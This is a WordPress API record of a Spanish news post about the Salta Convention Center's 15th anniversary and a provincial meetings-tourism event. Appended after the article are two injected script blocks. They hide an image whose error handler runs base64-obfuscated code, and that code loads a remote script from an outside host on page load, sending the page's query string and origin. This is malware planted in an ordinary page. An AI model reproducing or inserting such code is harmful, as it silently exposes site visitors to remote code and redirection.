{"id":1241,"date":"2022-08-05T11:26:38","date_gmt":"2022-08-05T14:26:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1241"},"modified":"2025-08-14T00:39:20","modified_gmt":"2025-08-14T03:39:20","slug":"el-centro-de-convenciones-de-salta-celebra-sus-15-anos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1241","title":{"rendered":"El Centro de Convenciones de Salta celebra sus 15 a\u00f1os"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#3a2b01\"><em>En marco de la celebraci\u00f3n se realizar\u00e1 el 5\u00b0 Encuentro Provincial de Turismo de Reuniones que contar\u00e1 con la participaci\u00f3n de referentes nacionales y provinciales. Las inscripciones se encuentran abiertas.<\/em><\/h3>\n\n\n\n<p>El 11 de agosto el Centro de Convenciones de Salta, principal sede de eventos de la provincia, cumple 15 a\u00f1os de su apertura y lo celebra con la realizaci\u00f3n del 5\u00b0 Encuentro Provincial de Turismo de Reuniones, organizado junto al Ministerio de Turismo y Deportes de la Provincia y el Bureau de Convenciones de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"906\" height=\"600\" data-id=\"1243\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios.jpg\" alt=\"\" class=\"wp-image-1243\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios.jpg 906w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/3638-el-centro-de-convenciones-de-salta-celebra-sus-15-anios-634x420.jpg 634w\" sizes=\"(max-width: 906px) 100vw, 906px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"1244\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/84033-el-centro-de-convenciones-de-salta-celebra-sus-15-anios.jpg\" alt=\"\" class=\"wp-image-1244\"\/><\/figure>\n<\/figure>\n\n\n\n<p>El encuentro, que se llevar\u00e1 a cabo desde las 8.30 hs en las instalaciones del Centro de Convenciones de Salta, reunir\u00e1 a autoridades nacionales y provinciales, referentes de los municipios, proveedores para eventos, organizadores de congresos, universidades y referentes del sector p\u00fablico y privado vinculados al Turismo de Reuniones.<\/p>\n\n\n\n<p>El mismo funcionar\u00e1 como un espacio de intercambio y profesionalizaci\u00f3n para todos los actores de la Industria de Reuniones de la provincia, abordando all\u00ed la actualidad, las tendencias y la importancia del impacto econ\u00f3mico del Turismo de Reuniones en Salta.<\/p>\n\n\n\n<p>Uno de los principales objetivos del encuentro tambi\u00e9n se centrar\u00e1 en la sensibilizaci\u00f3n a los actores del interior de la provincia sobre la importancia del desarrollo de este segmento en sus municipios, brind\u00e1ndoles herramientas y acompa\u00f1amiento. En este contexto, se llevar\u00e1 a cabo un panel en el que participar\u00e1n intendentes de distintas localidades de la provincia que expondr\u00e1n la experiencia de trabajo de cada comunidad en Turismo de Reuniones.<\/p>\n\n\n\n<p>En la jornada se brindar\u00e1n distintas capacitaciones entre la que se destacan \u201cEventos Sustentables y buenas pr\u00e1cticas en el segmento MICE\u201d y \u201cRol de las mujeres en el Turismo de Reuniones\u201d. Tambi\u00e9n se har\u00e1 la actualizaci\u00f3n estad\u00edstica de la provincia como destino sede a nivel nacional y se realizar\u00e1 un panel de sensibilizaci\u00f3n de prestadores directos e indirectos que involucra a la industria. Todo esto incentivando al trabajo en equipo para revalidar a Salta como uno de los principales destinos Sede de Eventos a nivel nacional.<\/p>\n\n\n\n<p>En la oportunidad, tambi\u00e9n se realizar\u00e1 la presentaci\u00f3n de la Escuela de Negocios de AOCA (Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y Bur\u00f3s de Convenciones).<\/p>\n\n\n\n<p>Cabe destacar que la participaci\u00f3n es gratuita, pero requiere inscripci\u00f3n previa. Para ello, los interesados pueden hacerlo de forma directa en\u00a0<a href=\"https:\/\/forms.gle\/PQEz8ATU7ZLqyzpT6\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/forms.gle\/PQEz8ATU7ZLqyzpT6<\/a>\u00a0o por mail a\u00a0<a href=\"http:\/\/gsoldano@turismosalta.gov.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/gsoldano@turismosalta.gov.ar<\/a><\/p>\n\n\n\n<p><strong>15 a\u00f1os de historia<\/strong><\/p>\n\n\n\n<p>Finalizando la jornada, los participantes del encuentro y los referentes del sector p\u00fablico y privado de la industria de reuniones, participar\u00e1n de la celebraci\u00f3n por los 15 a\u00f1os del Centro de Convenciones de Salta. Los presentes disfrutar\u00e1n un c\u00f3ctel acompa\u00f1ados por la m\u00fasica de la Orquesta Sinf\u00f3nica de Salta, que tambi\u00e9n brindar\u00e1 una presentaci\u00f3n para todo el p\u00fablico el viernes 12 de agosto.<\/p>\n\n\n\n<p>El Centro de Convenciones de Salta cuenta con una gran trayectoria y relevancia, siendo sede de los eventos m\u00e1s importantes que se realizaron en la provincia en los \u00faltimos a\u00f1os. El mismo se inaugur\u00f3 el 11 de Agosto del 2007 para satisfacer la creciente demanda del segmento de turismo que engloba la organizaci\u00f3n de congresos, ferias, exposiciones, eventos deportivos, viajes corporativos y de incentivo.<\/p>\n\n\n\n<p>La majestuosa obra se considera como una de las m\u00e1s importantes del interior del pa\u00eds por su envergadura, no solo en infraestructura, sino tambi\u00e9n por su capacidad y tecnolog\u00eda de punta.<\/p>\n\n\n\n<p>A partir del 2012 se cre\u00f3 el Centro de Convenciones de Salta &#8211; Sociedad del Estado, contando con el acompa\u00f1amiento del Ministerio de Turismo y Deportes de la provincia de Salta, e involucrando a diversos organismos del sector p\u00fablico y privado.<\/p>\n\n\n\n<p>Se reformularon nuevos objetivos con los que se trabaja para promover e impulsar el Turismo de Reuniones y liderar la realizaci\u00f3n permanente de eventos propios y de terceros, a nivel local, nacional e internacional.<br>Con este acompa\u00f1amiento, se logr\u00f3 posicionar a la Provincia de Salta dentro de la Argentina y en la Regi\u00f3n de Am\u00e9rica Latina, como uno de los destinos m\u00e1s elegidos de la industria MICE ( Meetings, Incentives, Congress and Expositions) para la realizaci\u00f3n de todo tipo de Reuniones, viajes de Incentivos, Congresos y Exposiciones.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-centro-de-convenciones-de-salta-celebra-sus-15-anios-84033\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En marco de la celebraci\u00f3n se realizar\u00e1 el 5\u00b0 Encuentro Provincial de Turismo de Reuniones que contar\u00e1 con la participaci\u00f3n de referentes nacionales y provinciales. Las inscripciones se encuentran abiertas. El 11 de agosto el Centro de Convenciones de Salta, principal sede de eventos de la provincia, cumple 15 a\u00f1os de su apertura y lo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,6],"tags":[],"class_list":{"0":"post-1241","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1241"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1241"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1241\/revisions"}],"predecessor-version":[{"id":7406,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1241\/revisions\/7406"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1242"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1241"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}